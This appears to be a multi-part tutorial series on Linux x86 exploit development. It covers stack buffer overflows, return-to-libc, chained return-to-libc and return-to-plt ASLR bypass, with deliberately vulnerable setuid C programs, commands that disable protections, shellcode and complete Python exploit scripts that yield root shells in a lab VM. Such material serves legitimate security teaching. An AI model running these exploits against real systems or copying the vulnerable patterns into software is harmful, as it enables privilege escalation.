Bypassing ASLR – Part I

Prerequisite:

  1. Classic Stack Based Buffer Overflow

VM Setup: Ubuntu 12.04 (x86)

In previous posts, we saw that attacker needs to know

  • stack address (to jump to shellcode)
  • libc base address (to successfully bypass NX bit)

inorder to exploit a vulnerable code. Hence to thwart attacker’s action, security researchers came up with an exploit mitigation called “ASLR”!!

What is ASLR?

Address space layout randomization (ASLR) is an exploit mitigation technique that randomizes

  • Stack address.
  • Heap address.
  • Shared library address.

Once the above addresses are randomized, in particular when shared library address is randomized, the approach we took to bypass NX bit wont work since attacker needs to know libc base address. But this mitigation technique is not completely foolproof, hence in this post lets see how to bypass shared library address randomization!!

We already know from previous post’s exp.py libc function address was calculated as follows:

libc function address = libc base address + function offset

where

  • libc base address was constant (0xb7e22000 – for our ‘vuln’ binary) since randomization was turned off.
  • function offset was also constant (obtained from “readelf -s libc.so.6 | grep “)

Now when we turn on full randomization (using below command)

#echo 2 > /proc/sys/kernel/randomize_va_space

libc base address would get randomized.

NOTE: Only libc base address is randomized, offset of a particular function from its base address always remains constant!! Hence if we can bypass shared library base address randomization, vulnerable programs can be successfully exploited (using below three techniques) even when ASLR is turned on!!

  • Return-to-plt (this post)
  • Brute force (part 2)
  • GOT overwrite and GOT dereference (part 3)

What is return-to-plt?

In this technique instead of returning to a libc function (whose address is randomized), attacker returns to a function’s PLT (whose address is NOT randomized – its address is known prior to execution itself). Since ‘function@PLT’ is not randomized, attacker no more needs to predict libc base address instead he can simply return to ‘function@PLT’ inorder to invoke ‘function’.

What is PLT, how does invoking ‘function@PLT’ invokes ‘function’?

To know about Procedural Linkage Table (PLT), let me brief about shared libraries!!

Unlike static libraries, shared libraries text segment is shared among multiple processes while its data segment is unique to each process. This helps in reducing memory and disk space. Since text segment is shared among multiple processes, it should have only Read and eXecute permissions and hence dynamic linker cannot relocate a data symbol or a function address present inside the text segment (since there is no write permission to it). Then how does dynamic linker relocate shared library symbols at runtime without modifying its text segment? Its done using PIC!!

What is PIC?

Position Independent Code (PIC) was developed to address this issue – It makes sure that shared libraries text segment is shared among multiple processes despite performing relocation at load time. PIC achieves this with a level of indirection – Shared libraries text segment doesnt contain absolute virtual address in place of global symbol and function references instead it points to a specific table in data segment. This table is the place-holder for global symbol and function’s absolute virtual address. Dynamic linker as part of relocation fills up this table. Thus while relocation only data segment is modified and text segment remains intact!!

Dynamic linker relocates global symbols and functions found in PIC in two different ways as described below:
  • Global Offset Table (GOT): Global offset table contains a 4 byte entry for each global variable, where the 4 byte entry contains the address of the global variable. When an instruction in code segment refers to a global variable, instead of global variable’s absolute virtual address the instruction points to an entry in GOT. This GOT entry is relocated by the dynamic linker when the shared library is loaded. Thus PIC uses this table to relocate global symbols with a single level of indirection.
  • Procedural Linkage Table (PLT)Procedural Linkage Table contains a stub code for each global function. A call instruction in text segment doesnt call the function (‘function’) directly instead it calls the stub code(function@PLT). This stub code with the help of dynamic linker resolves the function address and its copied to GOT (GOT[n]). This resolution happens only during the first invocation of the function (‘function’), later on when a call instruction in code segment calls the stub code ( function@PLT) instead of invoking dynamic linker to resolve the function address (‘function’), stub code directly obtains the function address from GOT (GOT[n]) and jumps to it.Thus PIC uses this table to relocate function addresses with two level of indirection.

Good you read about PIC and understood that it helps to keep shared libraries text segment intact and hence it helps shared libraries text segment to be really shared among many processes!!. But did you ever wonder, why on the earth executable’s text segment need to have a GOT entry or PLT stub code when its NOT shared among any process?!? Its because of security protection mechanism. Nowadays by default text segments are only given read and execute permission and no write permission (R_X). This security protection mechanism doesnt allow even the dynamic linker to write to text segment and hence it cant relocate data symbols or function address found inside the text segment. Hence to allow dynamic linker relocation, executables too need GOT entries and PLT stub codes just like shared libraries!!

Example:

//eg.c
//$gcc -g -o eg eg.c
#include <stdio.h>

int main(int argc, char* argv[]) {
 printf("Hello %s\n", argv[1]);
 return 0;
}

Below disassembly shows us that ‘printf’ isnt invoked directly instead its corresponding PLT code is invoked ‘printf@PLT’.

(gdb) disassemble main
Dump of assembler code for function main:
 0x080483e4 <+0>: push %ebp
 0x080483e5 <+1>: mov %esp,%ebp
 0x080483e7 <+3>: and $0xfffffff0,%esp
 0x080483ea <+6>: sub $0x10,%esp
 0x080483ed <+9>: mov 0xc(%ebp),%eax
 0x080483f0 <+12>: add $0x4,%eax
 0x080483f3 <+15>: mov (%eax),%edx
 0x080483f5 <+17>: mov $0x80484e0,%eax
 0x080483fa <+22>: mov %edx,0x4(%esp)
 0x080483fe <+26>: mov %eax,(%esp)
 0x08048401 <+29>: call 0x8048300 <printf@plt>
 0x08048406 <+34>: mov $0x0,%eax
 0x0804840b <+39>: leave 
 0x0804840c <+40>: ret 
End of assembler dump.
(gdb) disassemble 0x8048300
Dump of assembler code for function printf@plt:
 0x08048300 <+0>: jmp *0x804a000
 0x08048306 <+6>: push $0x0
 0x0804830b <+11>: jmp 0x80482f0
End of assembler dump.
(gdb) 

Before printf’s first invocation, its corresponding GOT entry (0x804a000) points back to PLT code (0x8048306) itself. Thus when first time printf function is invoked, its corresponding function address gets resolved with the help of dynamic linker.

(gdb) x/1xw 0x804a000
0x804a000 <printf@got.plt>: 0x08048306
(gdb)

Now after printf’s invocation, its corresponding GOT entry contains printf function address (as shown below):

(gdb) x/1xw 0x804a000
0x804a000 <printf@got.plt>: 0xb7e6e850
(gdb)

NOTE 1: If you want to know more PLT’s and GOT’s, check out this blog post!!

NOTE 2: In a separate post, I’ll talk in detail about how a libc function address is resolved dynamically with the help of dynamic linker. As of now just remember that below two statements (part of printf@PLT) are responsible for function address resolution!!

 0x08048306 <+6>: push $0x0
 0x0804830b <+11>: jmp 0x80482f0

Now with these knowledge, we come to know that attacker doesn’t need exact libc function address to invoke a libc function, he can simply invoke it using ‘function@PLT’ address (which is know prior to execution).

Vulnerable Code:

#include <stdio.h>
#include <string.h>

/* Eventhough shell() function isnt invoked directly, its needed here since 'system@PLT' and 'exit@PLT' stub code should be present in executable to successfully exploit it. */
void shell() {
 system("/bin/sh");
 exit(0);
}

int main(int argc, char* argv[]) {
 int i=0;
 char buf[256];
 strcpy(buf,argv[1]);
 printf("%s\n",buf);
 return 0;
}

Compilation Commands:

#echo 2 > /proc/sys/kernel/randomize_va_space
$gcc -g -fno-stack-protector -o vuln vuln.c
$sudo chown root vuln
$sudo chgrp root vuln
$sudo chmod +s vuln

Now disassembling executable ‘vuln’ we can find addresses of ‘system@PLT’ and ‘exit@PLT’

(gdb) disassemble shell
Dump of assembler code for function shell:
 0x08048474 <+0>: push %ebp
 0x08048475 <+1>: mov %esp,%ebp
 0x08048477 <+3>: sub $0x18,%esp
 0x0804847a <+6>: movl $0x80485a0,(%esp)
 0x08048481 <+13>: call 0x8048380 <system@plt>
 0x08048486 <+18>: movl $0x0,(%esp)
 0x0804848d <+25>: call 0x80483a0 <exit@plt>
End of assembler dump.
(gdb)

Using these addresses we can write an exploit code which bypasses ASLR (and NX bit)!!

Exploit Code:

#exp.py
#!/usr/bin/env python
import struct
from subprocess import call

system = 0x8048380
exit = 0x80483a0
system_arg = 0x80485b5     #Obtained from hexdump output of executable 'vuln'

#endianess convertion
def conv(num):
 return struct.pack("<I",num)

# Junk + system + exit + system_arg
buf = "A" * 272
buf += conv(system)
buf += conv(exit)
buf += conv(system_arg)

print "Calling vulnerable program"
call(["./vuln", buf])

Executing above exploit program gives us root shell as shown below:

$ python exp.py 
Calling vulnerable program
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA������
# id
uid=1000(sploitfun) gid=1000(sploitfun) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),1000(sploitfun)
# exit
$

NOTE: Inorder to to get this root shell, executable should contain ‘system@PLT’ and ‘exit@PLT’ code. In part III, I will discuss about GOT overwrite and GOT dereferencing techniques which helps attackers to invoke a libc function even when there is no required PLT stub code present in the executable and also when ASLR is turned on.

Bypassing NX bit using chained return-to-libc

Prerequisite:

  1. Classic Stack Based Buffer Overflow
  2. Bypassing NX bit using return-to-libc

VM Setup: Ubuntu 12.04 (x86)

Chained returned-to-libc?

As seen in previous post, need arises for an attacker to call multiple libc functions for a successful exploit. A simple way to chain multiple libc functions is to place one libc function address after another in the stack, but its not possible because of function arguments. Not very clear, no issues just read on!!

Vulnerable Code:

//vuln.c
#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[]) {
 char buf[256];
 seteuid(getuid()); /* Temporarily drop privileges */
 strcpy(buf,argv[1]);
 printf("%s",buf);
 fflush(stdout);
 return 0;
}

NOTE: This code is same as the vulnerable code listed in previous post (vuln_priv.c).

Compilation Commands:

#echo 0 > /proc/sys/kernel/randomize_va_space
$gcc -fno-stack-protector -g -o vuln vuln.c
$sudo chown root vuln
$sudo chgrp root vuln
$sudo chmod +s vuln

As said in previous post, chaining seteuid, system and exit would allows us to exploit the vulnerable code ‘vuln’. But is not a straight forward task because of below two problems:

  1. At the same position in the stack, attacker would be needed to place function argument of both libc functions or a function argument of one libc function and an address of another libc function which is obviously not possible (as depicted in the below picture).
  2. seteuid_arg should be zero. But since our buffer overflow is due to strcpy, zero becomes a bad character ie) characters after this zero wont be copied into the stack by strcpy().

Lets now see how to overcome these two problems.

Problem 1: To address this problem Nergal talks about two brilliant techniques

  1. ESP Lifting
  2. Frame Faking

in his phrack article. Here lets see ONLY about frame faking since to apply esp lifting technique binary should be compiled without frame pointer (-fomit-frame-pointer) support. But since our binary (vuln) contains frame pointers, we need to apply frame faking technique.

Frame Faking?

In this technique instead of overwriting return address directly with libc function address (seteuid in this example), we overwrite it with “leave ret” instruction. This allows the attacker to store function arguments in stack without any overlap and thus allowing its corresponding libc function to be invoked, without any issues. Lets see how?.

Stack Layout: While faking frame attacker overflows the buffer as shown in below stack layout to successfully chain libc functions seteuid, system and exit:

Red highlighted ones in the above picture are return addresses where every “leave ret” instruction invokes the libc function above it. For example the first “leave ret” instruction (located at stack address 0xbffff1fc) invokes seteuid(), while the second “leave ret” (located at stack address 0xbffff20c) invokes system() and the third “leave ret” instruction (located at stack address 0xbffff21c) invokes exit().

How a leave ret instruction invokes a libc function above it?

To know the answer for the above question, first we need to know about “leave”. A “leave” instruction translates to:

mov ebp,esp            //esp = ebp
pop ebp                //ebp = *esp

Lets disassemble main() function to know more about “leave ret” instruction.

(gdb) disassemble main
Dump of assembler code for function main:
  ...
  0x0804851c <+88>: leave                  //mov ebp, esp; pop ebp;
  0x0804851d <+89>: ret                    //return
End of assembler dump.
(gdb)

Main’s Epilogue:

Before main’s epilogue executed, as shown in the above stack layout, attacker would have overflown the buffer and would have overwritten, main’s ebp with fake_ebp0 (0xbffff204) and return address with “leave ret” instruction address (0x0804851c). Now when CPU is about to execute main’s epilogue,  EIP points to text address 0x0804851c (“leave ret”). On execution, following happens:

  • ‘leave’ changes following registers
    • esp = ebp = 0xbffff1f8
    • ebp = 0xbffff204, esp = 0xbffff1fc
  • ‘ret’ executes “leave ret” instruction (located at stack address 0xbffff1fc) .

seteuid: Now again EIP points to text address 0x0804851c (“leave ret”). On execution, following happens:

  • ‘leave’ changes following registers
    • esp = ebp = 0xbffff204
    • ebp = 0xbffff214, esp =0xbffff208
  • ‘ret’ executes seteuid() (located at stack address 0xbffff208). To invoke seteuid successfully, seteuid_arg should be placed at offset 8 from seteuid_addr ie) at stack address 0xbffff210
  • After seteuid() gets invoked, “leave ret” instruction (located at stack address 0xbffff20c), gets executed.

Following the above procedure, system and exit would also get invoked since the stack is setup’d for it invocation by the attacker – as shown in the above stack layout picture.

Problem 2: In our case seteuid_arg should be zero. But since zero being a bad character, how to write zero at stack address 0xbffff210? There is a simple solution to it, which is discussed by nergal in the same article. While chaining libc functions, first few calls should be strcpy which copies a NULL byte into seteuid_arg’s stack location.

NOTE: But unfortunately in my libc.so.6 strcpy’s function address is 0xb7ea6200 – ie) libc function address itself contains a NULL byte (bad character!!). Hence strcpy cant be used to successfully exploit the vulnerable code. sprintf (whose function address is 0xb7e6e8d0) is used as a replacement for strcpy ie) using sprintf NULL byte is copied in to seteuid_arg’s stack location.

Thus following libc functions are chained to solve the above two problems and to successfully obtain root shell:

sprintf | sprintf | sprintf | sprintf | seteuid | system | exit

Exploit code:

#exp.py
#!/usr/bin/env python
import struct
from subprocess import call

fake_ebp0 = 0xbffff1a0
fake_ebp1 = 0xbffff1b8
fake_ebp2 = 0xbffff1d0
fake_ebp3 = 0xbffff1e8
fake_ebp4 = 0xbffff204
fake_ebp5 = 0xbffff214
fake_ebp6 = 0xbffff224
fake_ebp7 = 0xbffff234
leave_ret = 0x0804851c
sprintf_addr = 0xb7e6e8d0
seteuid_addr = 0xb7f09720
system_addr = 0xb7e61060
exit_addr = 0xb7e54be0
sprintf_arg1 = 0xbffff210
sprintf_arg2 = 0x80485f0
sprintf_arg3 = 0xbffff23c
system_arg = 0x804829d
exit_arg = 0xffffffff

#endianess convertion
def conv(num):
 return struct.pack("<I",num)

buf = "A" * 264 
buf += conv(fake_ebp0) 
buf += conv(leave_ret) 
#Below four stack frames are for sprintf (to setup seteuid arg )
buf += conv(fake_ebp1) 
buf += conv(sprintf_addr) 
buf += conv(leave_ret) 
buf += conv(sprintf_arg1) 
buf += conv(sprintf_arg2) 
buf += conv(sprintf_arg3) 
buf += conv(fake_ebp2) 
buf += conv(sprintf_addr) 
buf += conv(leave_ret) 
sprintf_arg1 += 1
buf += conv(sprintf_arg1) 
buf += conv(sprintf_arg2) 
buf += conv(sprintf_arg3) 
buf += conv(fake_ebp3) 
buf += conv(sprintf_addr) 
buf += conv(leave_ret) 
sprintf_arg1 += 1
buf += conv(sprintf_arg1) 
buf += conv(sprintf_arg2) 
buf += conv(sprintf_arg3) 
buf += conv(fake_ebp4) 
buf += conv(sprintf_addr) 
buf += conv(leave_ret) 
sprintf_arg1 += 1
buf += conv(sprintf_arg1) 
buf += conv(sprintf_arg2) 
buf += conv(sprintf_arg3)
#Dummy - To avoid null byte in fake_ebp4. 
buf += "X" * 4 
#Below stack frame is for seteuid
buf += conv(fake_ebp5) 
buf += conv(seteuid_addr) 
buf += conv(leave_ret) 
#Dummy - This arg is zero'd by above four sprintf calls
buf += "Y" * 4 
#Below stack frame is for system
buf += conv(fake_ebp6) 
buf += conv(system_addr) 
buf += conv(leave_ret) 
buf += conv(system_arg) 
#Below stack frame is for exit
buf += conv(fake_ebp7) 
buf += conv(exit_addr) 
buf += conv(leave_ret) 
buf += conv(exit_arg) 

print "Calling vulnerable program"
call(["./vuln", buf])

Executing the above exploit code gives us root shell!!

$ python exp.py 
Calling vulnerable program
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�����������������\��������������\��������������\�������������\��� �������AAAA0�������Ѕ
# id
uid=1000(sploitfun) gid=1000(sploitfun) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),1000(sploitfun)
# exit
$

Now having bypassed NX bit completely, lets see how to bypass ASLR in the next post.

Bypassing NX bit using return-to-libc

Prerequisite:

  1. Classic Stack Based Buffer Overflow

VM Setup: Ubuntu 12.04 (x86)

In previous posts, we saw that attacker

  • copies shellcode to stack and jumps to it!!

in order to successfully exploit vulnerable code. Hence to thwart attacker’s action, security researchers came up with an exploit mitigation called “NX Bit”!!

What is NX Bit?

Its an exploit mitigation technique which makes certain areas of memory non executable and makes an executable area, non writable. Example: Data, stack and heap segments are made non executable while text segment is made non writable.

With NX bit turned on, our classic approach to stack based buffer overflow will fail to exploit the vulnerability. Since in classic approach, shellcode was copied into the stack and return address was pointing to shellcode. But now since stack is no more executable, our exploit fails!! But this mitigation technique is not completely foolproof, hence in this post lets see how to bypass NX Bit!!

Vulnerable Code: This code is same as previous post vulnerable code with a slight modification. I will talk later about the need for modification.

 //vuln.c
#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[]) {
 char buf[256]; /* [1] */ 
 strcpy(buf,argv[1]); /* [2] */
 printf("%s\n",buf); /* [3] */
 fflush(stdout);  /* [4] */
 return 0;
}

Compilation Commands:

#echo 0 > /proc/sys/kernel/randomize_va_space
$gcc -g -fno-stack-protector -o vuln vuln.c
$sudo chown root vuln
$sudo chgrp root vuln
$sudo chmod +s vuln

NOTE: “-z execstack” argument isnt passed to gcc and hence now the stack is Non eXecutable which can be verified as shown below:

$ readelf -l vuln
...
Program Headers:
 Type      Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
 PHDR      0x000034 0x08048034 0x08048034 0x00120 0x00120 R E 0x4
 INTERP    0x000154 0x08048154 0x08048154 0x00013 0x00013 R 0x1
 [Requesting program interpreter: /lib/ld-linux.so.2]
 LOAD      0x000000 0x08048000 0x08048000 0x00678 0x00678 R E 0x1000
 LOAD      0x000f14 0x08049f14 0x08049f14 0x00108 0x00118 RW 0x1000
 DYNAMIC   0x000f28 0x08049f28 0x08049f28 0x000c8 0x000c8 RW 0x4
 NOTE      0x000168 0x08048168 0x08048168 0x00044 0x00044 R 0x4
 ...
 GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4
 GNU_RELRO 0x000f14 0x08049f14 0x08049f14 0x000ec 0x000ec R 0x1
$

Stack segment contains only RW Flag and no E flag!!

How to bypass NX bit and achieve arbitrary code execution?

NX bit can be bypassed using an attack technique called “return-to-libc”. Here return address is overwritten with a particular libc function address (instead of stack address containing the shellcode). For example if an attacker wants to  spawn a shell, he overwrites return address with system() address and also sets up the appropriate arguments required by system() in the stack, for its successful invocation.

Having already disassembled and drawn the stack layout for vulnerable code, lets write an exploit code to bypass NX bit!!

Exploit Code:

#exp.py
#!/usr/bin/env python
import struct
from subprocess import call

#Since ALSR is disabled, libc base address would remain constant and hence we can easily find the function address we want by adding the offset to it. 
#For example system address = libc base address + system offset
#where 
       #libc base address = 0xb7e22000 (Constant address, it can also be obtained from cat /proc//maps)
       #system offset     = 0x0003f060 (obtained from "readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system")

system = 0xb7e61060        #0xb7e2000+0x0003f060
exit = 0xb7e54be0          #0xb7e2000+0x00032be0

#system_arg points to 'sh' substring of 'fflush' string. 
#To spawn a shell, system argument should be 'sh' and hence this is the reason for adding line [4] in vuln.c. 
#But incase there is no 'sh' in vulnerable binary, we can take the other approach of pushing 'sh' string at the end of user input!!
system_arg = 0x804827d     #(obtained from hexdump output of the binary)

#endianess conversion
def conv(num):
 return struct.pack("<I",num)

# Junk + system + exit + system_arg
buf = "A" * 268
buf += conv(system)
buf += conv(exit)
buf += conv(system_arg)

print "Calling vulnerable program"
call(["./vuln", buf])

Executing above exploit program gives us root shell as shown below:

$ python exp.py 
Calling vulnerable program
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`���K��}�
# id
uid=1000(sploitfun) gid=1000(sploitfun) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),1000(sploitfun)
# exit
$

Bingo we got the root shell!! But in real applications, its NOT that easy since root setuid programs would have adopted principle of least privilege.

What is principle of least privilege?

This technique allows root setuid program to obtain root privilege only when required. That is when required they gain root privilege and when NOT required they drop the obtained root privilege. Normal approach followed by root setuid programs is to drop root privileges before getting input from the user. Thus even when user input is malicious, attacker wont get a root shell. For example below vulnerable code wont allow the attacker to get a root shell.

Vulnerable Code:

//vuln_priv.c
#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[]) {
 char buf[256];
 seteuid(getuid()); /* Temporarily drop privileges */ 
 strcpy(buf,argv[1]);
 printf("%s\n",buf);
 fflush(stdout);
 return 0;
}

Above vulnerable code doesnt give root shell when we try to exploit it using below exploit code.

#exp_priv.py
#!/usr/bin/env python
import struct
from subprocess import call

system = 0xb7e61060
exit = 0xb7e54be0

system_arg = 0x804829d

#endianess conversion
def conv(num):
 return struct.pack("<I",num)

# Junk + system + exit + system_arg
buf = "A" * 268
buf += conv(system)
buf += conv(exit)
buf += conv(system_arg)

print "Calling vulnerable program"
call(["./vuln_priv", buf])

NOTE: exp_priv.py is slightly modified version of exp.py!! Just the system_arg variable is adjusted!!

$ python exp_priv.py 
Calling vulnerable program
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`���K川�
$ id
uid=1000(sploitfun) gid=1000(sploitfun) egid=0(root) groups=1000(sploitfun),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare)
$ rm /bin/ls
rm: remove write-protected regular file `/bin/ls'? y
rm: cannot remove `/bin/ls': Permission denied
$ exit
$

Is this the end of tunnel? How to exploit root setuid programs which applies principle of least privilege?

For vulnerable code (vuln_priv), our exploit (exp_priv.py) was calling system followed by exit which found to be insufficent for obtaining root shell. But if our exploit code (exp_priv.py) was modified to call the following libc functions (in the listed order)

  • seteuid(0)
  • system(“sh”)
  • exit()

we would have obtained the root shell. This technique is called chaining of return-to-libc and its discussed here!!

Classic Stack Based Buffer Overflow

VM Setup: Ubuntu 12.04 (x86)

This post is the most simplest of the exploit development tutorial series and in the internet you can already find many articles about it. Despite its abundance and familiarity, I prefer to write my own blog post for it, since it would serve as a prerequisite for many of my future posts!!

What is Buffer Overflow?

Copying source buffer into destination buffer could result in overflow when

  1. Source string length is greater than destination string length.
  2. No size check is performed.

There are two types of buffer overflow:

  1. Stack Based Buffer Overflow – Here the destination buffer resides in stack
  2. Heap Based Buffer Overflow – Here the destination buffer resides in heap

Here in this post, I will talk only about stack based buffer overflow. Heap overflows will be discussed in ‘Level 3’ of Linux (x86) Exploit Development Tutorial Series!!

Buffer overflow bugs lead to arbitrary code execution!!

What is arbitrary code execution?

Arbitrary code execution allows attacker to execute his code inorder to gain control of the victim machine. Gaining control of victim machine is achieved using many ways like spawning a root shell, adding a new user, opening a network port etc…

Sounds interesting, enough of definitions lets look into a buffer overflow vulnerable code!!

Vulnerable Code:

//vuln.c
#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[]) {
        /* [1] */ char buf[256];
        /* [2] */ strcpy(buf,argv[1]);
        /* [3] */ printf("Input:%s\n",buf);
        return 0;
}

Compilation Commands:

#echo 0 > /proc/sys/kernel/randomize_va_space
$gcc -g -fno-stack-protector -z execstack -o vuln vuln.c
$sudo chown root vuln
$sudo chgrp root vuln
$sudo chmod +s vuln

Line [2] of the above vulnerable program shows us that a buffer overflow bug exists. And this bug could lead to arbitrary code execution since source buffer contents are user provided input!!

How arbitrary code execution is achieved?

Arbitrary code execution is achieved using a technique called “Return Address Overwrite“. This technique helps the attacker to overwrite the ‘return address’ located in stack and this overwrite would lead to arbitrary code execution.

Before looking into the exploit code, for better understanding, lets disassemble and draw the stack layout for vulnerable code!!

Disassembly:

(gdb) disassemble main
Dump of assembler code for function main:
   //Function Prologue
   0x08048414 <+0>:	push   %ebp                      //backup caller's ebp
   0x08048415 <+1>:	mov    %esp,%ebp                 //set callee's ebp to esp

   0x08048417 <+3>:	and    $0xfffffff0,%esp          //stack alignment
   0x0804841a <+6>:	sub    $0x110,%esp               //stack space for local variables
   0x08048420 <+12>:	mov    0xc(%ebp),%eax            //eax = argv
   0x08048423 <+15>:	add    $0x4,%eax                 //eax = &argv[1]
   0x08048426 <+18>:	mov    (%eax),%eax               //eax = argv[1]
   0x08048428 <+20>:	mov    %eax,0x4(%esp)            //strcpy arg2 
   0x0804842c <+24>:	lea    0x10(%esp),%eax           //eax = 'buf' 
   0x08048430 <+28>:	mov    %eax,(%esp)               //strcpy arg1
   0x08048433 <+31>:	call   0x8048330 <strcpy@plt>    //call strcpy
   0x08048438 <+36>:	mov    $0x8048530,%eax           //eax = format str "Input:%s\n"
   0x0804843d <+41>:	lea    0x10(%esp),%edx           //edx = buf
   0x08048441 <+45>:	mov    %edx,0x4(%esp)            //printf arg2
   0x08048445 <+49>:	mov    %eax,(%esp)               //printf arg1
   0x08048448 <+52>:	call   0x8048320 <printf@plt>    //call printf
   0x0804844d <+57>:	mov    $0x0,%eax                 //return value 0

   //Function Epilogue
   0x08048452 <+62>:	leave                            //mov ebp, esp; pop ebp; 
   0x08048453 <+63>:	ret                              //return
End of assembler dump.
(gdb)

Stack Layout:

As we already know user input of size greater than 256 would overflow the destination buffer and overwrite the return address stored in stack. Lets test it out by sending a series of “A”‘s .

Test Step 1: Is Return Address Overwrite possible?

$ gdb -q vuln
Reading symbols from /home/sploitfun/lsploits/new/csof/vuln...done.
(gdb) r `python -c 'print "A"*300'`
Starting program: /home/sploitfun/lsploits/new/csof/vuln `python -c 'print "A"*300'`
Input:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) p/x $eip
$1 = 0x41414141
(gdb)

Above output shows that Instruction Pointer Register (EIP) is overwritten with “AAAA” and this confirms return address overwrite is possible!!

Test Step 2: What is the offset from Destination Buffer?

Here lets find out at what offset return address is located from destination buffer ‘buf’. Having disassembled and drawn the stack layout for main(), lets now try to find offset location information!! Stack Layout shows that return address is located at offset (0x10c) from destination buffer ‘buf’. 0x10c is calculated as follows:

0x10c = 0x100 + 0x8 + 0x4

where

  • 0x100 is ‘buf’ size
  • 0x8 is alignment space
  • 0x4 is caller’s EBP

Thus user input of form “A” * 268 + “B” * 4, overwrites ‘buf’, alignment space and caller’s EBP with “A”‘s and return address with “BBBB”.

$ gdb -q vuln
Reading symbols from /home/sploitfun/lsploits/new/csof/vuln...done.
(gdb) r `python -c 'print "A"*268 + "B"*4'`
Starting program: /home/sploitfun/lsploits/new/csof/vuln `python -c 'print "A"*268 + "B"*4'`
Input:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) p/x $eip
$1 = 0x42424242
(gdb)

Above output shows that attacker gets control over return address. Return address located at stack location (0xbffff1fc) is overwritten with “BBBB”. With these informations, lets write an exploit program to achieve arbitrary code execution.

Exploit Code:

#exp.py 
#!/usr/bin/env python
import struct
from subprocess import call

#Stack address where shellcode is copied.
ret_addr = 0xbffff1d0       
              
#Spawn a shell
#execve(/bin/sh)
scode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

#endianess convertion
def conv(num):
 return struct.pack("<I",num)

# buf = Junk + RA + NOP's + Shellcode
buf = "A" * 268
buf += conv(ret_addr)
buf += "\x90" * 100
buf += scode

print "Calling vulnerable program"
call(["./vuln", buf])

Executing above exploit program gives us root shell as shown below:

$ python exp.py 
Calling vulnerable program
